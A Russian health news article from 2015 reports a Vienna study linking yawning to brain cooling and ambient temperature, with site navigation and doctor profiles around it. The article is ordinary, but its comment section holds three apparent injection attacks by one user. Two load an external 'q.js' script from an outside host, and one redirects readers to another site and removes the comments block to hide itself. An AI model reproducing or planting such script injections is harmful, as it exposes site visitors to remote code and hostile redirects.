Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Почему вы зеваете? Чтобы ...  >>  Почему вы зеваете? Чтобы остудить мозги!
 
Обратная связь
 

Почему вы зеваете? Чтобы остудить мозги!

Размер шрифта
11 марта 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Недавнее исследование смогло наконец найти объяснение тому, почему мы зеваем. И это нужно вовсе не для усиления притока крови к мозгу, как считалось ранее, оказывается, при зевании мы «охлаждаем» собственный мозг, тем самым помогая ему работать эффективнее.

Почему вы зеваете? Чтобы остудить мозги!

Циклы сон-бодрствование, стресс и многие другие процессы связаны с колебаниями температуры головного мозга. А главная функция зевания состоит как раз в том, чтобы поддерживать оптимальную температуру. Согласно этой гипотезе, частоту зевания можно легко регулировать, меняя температуру окружающей среды, ведь в прохладном помещении мозг будет охлаждаться куда быстрее. Ученые также предполагают, что мы зеваем находясь только в определенном диапазоне температур, своеобразном «температурном окне».

Стоит отметить, что существует два основных типа зевания: спонтанное и в ответ на зевание другого человека (это работает даже при просмотре фотографий, на которых люди зевают). Йорг Массен и Ким Дуч из Университета Вены измерили частоту второго типа зевания среди пешеходов на улицах Вены. Им предлагалось просмотреть серию фотографий с зевающими людьми, а затем рассказать о том, насколько часто они сами зевают. Ученые провели две серии экспериментов – летом и зимой, а затем сравнили полученные результаты с результатами аналогичного исследования, проведенного в Аризоне, которая известна своим жарким и засушливым климатом.

Результаты были таковы: в Вене люди чаще зевали летом, нежели зимой, в то время как в Аризоне наоборот – чаще зимой, чем летом. Это говорит о том, что здесь дело вовсе не в конкретном времени года, а в том, что ответное зевание чаще всего происходит при температуре окружающей среды, близкой к 20 градусам. Заразительность зевоты значительно снижается как на жаре (37 градусов – средняя температура летом в Аризоне), так и на холоде (зима в Вене). Так как зевание нужно для охлаждения мозга, то оно перестает работать, когда температура окружающей среды становится близка к температуре тела (37 градусов). Если же на улице мороз, то в дополнительном охлаждении головного мозга смысла попросту нет, считает ведущий автор исследования Йорг Массен.

Большинство исследований ответной зевоты подчеркивают ее связь с эмоциональными и личностными особенностями человека. Однако настоящая работа доказывает существование еще одной важной причины – необходимости регулировать температуру мозга. Охлаждение головного мозга, в свою очередь, улучшает его работу и повышает умственную работоспособность.

Так что зеваете вы не только из-за того, что не выспались. Возможно, ваш мозг просто говорит вам, что для более эффективной работы ему требуется немного прохлады.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:17

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как первым увидеть в толпе звезду? У нас есть научный ответ!   Оказывается, мозг знает, как нам не выпить лишнего! Почему же мы напиваемся?   Все, что вы помните о детстве, – неправда   Как не психовать?! Включите синий свет!  
17 июля 2013Куда смотреть, чтобы мозг заработал? А заодно спасти близкого от инсульта 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Как сохранить мозги в 30 лет
Как сохранить мозги в 40 лет
Корица может спасти от смерти

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.